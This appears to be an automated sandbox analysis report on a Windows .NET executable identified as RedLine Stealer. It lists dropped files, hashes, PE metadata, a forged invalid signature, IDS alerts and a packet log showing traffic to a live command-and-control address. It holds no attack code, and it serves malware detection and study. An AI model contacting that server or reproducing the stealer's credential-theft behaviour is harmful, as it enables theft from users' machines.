                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1026
                                                        Entropy (8bit):4.695505889681456
                                                        Encrypted:false
                                                        SSDEEP:24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
                                                        MD5:3E1BF32E65136B415337727A75BB2991
                                                        SHA1:4754D2DD51AEC8E287F0F298F5A81349578DEB56
                                                        SHA-256:448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
                                                        SHA-512:16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1026
                                                        Entropy (8bit):4.698193102830694
                                                        Encrypted:false
                                                        SSDEEP:24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
                                                        MD5:78472D7E4F5450A7EA86F47D75E55F39
                                                        SHA1:D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
                                                        SHA-256:2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
                                                        SHA-512:D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1026
                                                        Entropy (8bit):4.692704155467908
                                                        Encrypted:false
                                                        SSDEEP:24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
                                                        MD5:D0B81B6D51E4EDDB3769BCE2A5F1538F
                                                        SHA1:08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
                                                        SHA-256:18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
                                                        SHA-512:CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1026
                                                        Entropy (8bit):4.695505889681456
                                                        Encrypted:false
                                                        SSDEEP:24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
                                                        MD5:3E1BF32E65136B415337727A75BB2991
                                                        SHA1:4754D2DD51AEC8E287F0F298F5A81349578DEB56
                                                        SHA-256:448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
                                                        SHA-512:16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1026
                                                        Entropy (8bit):4.698193102830694
                                                        Encrypted:false
                                                        SSDEEP:24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
                                                        MD5:78472D7E4F5450A7EA86F47D75E55F39
                                                        SHA1:D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
                                                        SHA-256:2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
                                                        SHA-512:D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1026
                                                        Entropy (8bit):4.692704155467908
                                                        Encrypted:false
                                                        SSDEEP:24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
                                                        MD5:D0B81B6D51E4EDDB3769BCE2A5F1538F
                                                        SHA1:08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
                                                        SHA-256:18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
                                                        SHA-512:CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.8553638852307782
                                                        Encrypted:false
                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):98304
                                                        Entropy (8bit):0.08235737944063153
                                                        Encrypted:false
                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.8553638852307782
                                                        Encrypted:false
                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):663048
                                                        Entropy (8bit):7.712804788167852
                                                        Encrypted:false
                                                        SSDEEP:12288:Q+KncNPCdkjtqD56vpunMKgabsvmyArpBAz9TjcQ1AQw9xkR:0mPCdkpqF6vpjmsenVBA1jd1AT+
                                                        MD5:68B2A6E71C0C904A9AEABFC9ADBF7A21
                                                        SHA1:0577BCB0A9736B45F1EB92F6070AAC2134E674DC
                                                        SHA-256:F6B09208C3523BE3A490AF2FC305D4574B38D95A435C8A55402FCA38597E6DAC
                                                        SHA-512:077B52BF789DCA81F8155182EAE1FA8CE529586F70A2CB8CE7298917FB6F42C83DCB1CB9274E498295BDDA65D4D2D7DD41EF6EA086DFB510EF75C871FB8DAF46
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 68%
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.712804788167852
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:I5pvP0CU6M.exe
                                                        File size:663'048 bytes
                                                        MD5:68b2a6e71c0c904a9aeabfc9adbf7a21
                                                        SHA1:0577bcb0a9736b45f1eb92f6070aac2134e674dc
                                                        SHA256:f6b09208c3523be3a490af2fc305d4574b38d95a435c8a55402fca38597e6dac
                                                        SHA512:077b52bf789dca81f8155182eae1fa8ce529586f70a2cb8ce7298917fb6f42c83dcb1cb9274e498295bdda65d4d2d7dd41ef6ea086dfb510ef75c871fb8daf46
                                                        SSDEEP:12288:Q+KncNPCdkjtqD56vpunMKgabsvmyArpBAz9TjcQ1AQw9xkR:0mPCdkpqF6vpjmsenVBA1jd1AT+
                                                        TLSH:B9E4CFD03B36B319CEA55935E259DDBA82F10A68B044BAF719DC3B5735CC260AE0CF46
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."g..............0.............r.... ........@.. .......................@............@................................
                                                        Icon Hash:1bb3b3b3b3d389b3
                                                        Entrypoint:0x49e972
                                                        Entrypoint Section:.text
                                                        Digitally signed:true
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x6722EB14 [Thu Oct 31 02:27:32 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                        Signature Valid:false
                                                        Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                        Signature Validation Error:The digital signature of the object did not verify
                                                        Error Number:-2146869232
                                                        Not Before, Not After
                                                        • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                                        Subject Chain
                                                        • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                        Version:3
                                                        Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                        Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                        Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                        Serial:7C1118CBBADC95DA3752C46E47A27438
                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        push ebx
                                                        add byte ptr [ecx+00h], bh
                                                        jnc 00007F344905B562h
                                                        je 00007F344905B562h
                                                        add byte ptr [ebp+00h], ch
                                                        add byte ptr [ecx+00h], al
                                                        arpl word ptr [eax], ax
                                                        je 00007F344905B562h
                                                        imul eax, dword ptr [eax], 00610076h
                                                        je 00007F344905B562h
                                                        outsd
                                                        add byte ptr [edx+00h], dh
                                                        push eax
                                                        add byte ptr [edi+00h], ch
                                                        imul eax, dword ptr [eax], 006F0073h
                                                        outsb
                                                        add byte ptr [edx+00h], dl
                                                        outsd
                                                        add byte ptr [ebp+00h], dh
                                                        insb
                                                        add byte ptr [ebp+00h], ah
                                                        je 00007F344905B562h
                                                        je 00007F344905B562h
                                                        add byte ptr [eax], al
                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9e920 | 0x4f | .text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa0000 | 0x1988 | .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x9e800 | 0x3608 |
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa2000 | 0xc | .reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                        .text | 0x2000 | 0x9c9b8 | 0x9ca00 | 827723e3f3a266e21bd461075daf2f28 | False | 0.8503871957302475 | data | 7.711719915976035 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc | 0xa0000 | 0x1988 | 0x1a00 | f3f359b75bf01dd017d680590fefab17 | False | 0.7944711538461539 | data | 7.201037097140562 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc | 0xa2000 | 0xc | 0x200 | 0ba14ce87197e716b8df5425ca9ea3d6 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                        RT_ICON | 0xa0118 | 0x151a | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |  |  | 0.8863383931877082
                                                        RT_GROUP_ICON | 0xa1634 | 0x14 | data |  |  | 0.9
                                                        RT_GROUP_ICON | 0xa1648 | 0x14 | data |  |  | 1.05
                                                        RT_VERSION | 0xa165c | 0x32c | data |  |  | 0.45566502463054187
                                                        DLL | Import
                                                        mscoree.dll | _CorExeMain
                                                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                        2024-11-04T04:32:04.724301+0100 | 2849662 | ETPRO MALWARE RedLine - CheckConnect Request | 1 | 192.168.2.6 | 49718 | 45.137.22.248 | 55615 | TCP
                                                        2024-11-04T04:32:09.774888+0100 | 2045000 | ET MALWARE RedLine Stealer - CheckConnect Response | 1 | 45.137.22.248 | 55615 | 192.168.2.6 | 49718 | TCP
                                                        2024-11-04T04:32:10.039181+0100 | 2849351 | ETPRO MALWARE RedLine - EnvironmentSettings Request | 1 | 192.168.2.6 | 49718 | 45.137.22.248 | 55615 | TCP
                                                        2024-11-04T04:32:12.999384+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.175.87.197 | 443 | 192.168.2.6 | 49763 | TCP
                                                        2024-11-04T04:32:13.527487+0100 | 2045001 | ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound | 1 | 45.137.22.248 | 55615 | 192.168.2.6 | 49718 | TCP
                                                        2024-11-04T04:32:13.584322+0100 | 2849352 | ETPRO MALWARE RedLine - SetEnvironment Request | 1 | 192.168.2.6 | 49777 | 45.137.22.248 | 55615 | TCP
                                                        2024-11-04T04:32:15.174201+0100 | 2849662 | ETPRO MALWARE RedLine - CheckConnect Request | 1 | 192.168.2.6 | 49784 | 45.137.22.248 | 55615 | TCP
                                                        2024-11-04T04:32:20.283399+0100 | 2045000 | ET MALWARE RedLine Stealer - CheckConnect Response | 1 | 45.137.22.248 | 55615 | 192.168.2.6 | 49784 | TCP
                                                        2024-11-04T04:32:20.816931+0100 | 2849351 | ETPRO MALWARE RedLine - EnvironmentSettings Request | 1 | 192.168.2.6 | 49784 | 45.137.22.248 | 55615 | TCP
                                                        2024-11-04T04:32:23.737177+0100 | 2045001 | ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound | 1 | 45.137.22.248 | 55615 | 192.168.2.6 | 49784 | TCP
                                                        2024-11-04T04:32:24.140389+0100 | 2849352 | ETPRO MALWARE RedLine - SetEnvironment Request | 1 | 192.168.2.6 | 49837 | 45.137.22.248 | 55615 | TCP
                                                        2024-11-04T04:32:50.939185+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.175.87.197 | 443 | 192.168.2.6 | 49984 | TCP
                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Nov 4, 2024 04:32:14.146327972 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146354914 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146358013 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.146392107 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.146434069 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146444082 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146477938 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146488905 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146568060 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146579027 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146589994 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.146609068 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.146647930 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146657944 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146678925 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146682024 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.146720886 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.146722078 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146769047 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146780014 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146815062 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146825075 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146838903 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146862984 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.146903992 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146914959 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146923065 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146930933 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.146953106 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146966934 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146981955 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146998882 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147001028 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147013903 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147026062 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147053957 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147064924 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147090912 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147090912 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147103071 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147114038 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147119999 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147149086 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147159100 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147190094 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147198915 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147202015 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147209883 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147248030 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147258043 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147288084 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147299051 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147309065 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147336006 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147346020 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147393942 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147403955 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147413015 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147418976 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147435904 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147442102 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147444010 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147455931 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147464991 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147476912 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147483110 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147490025 CET4977755615192.168.2.645.137.22.248
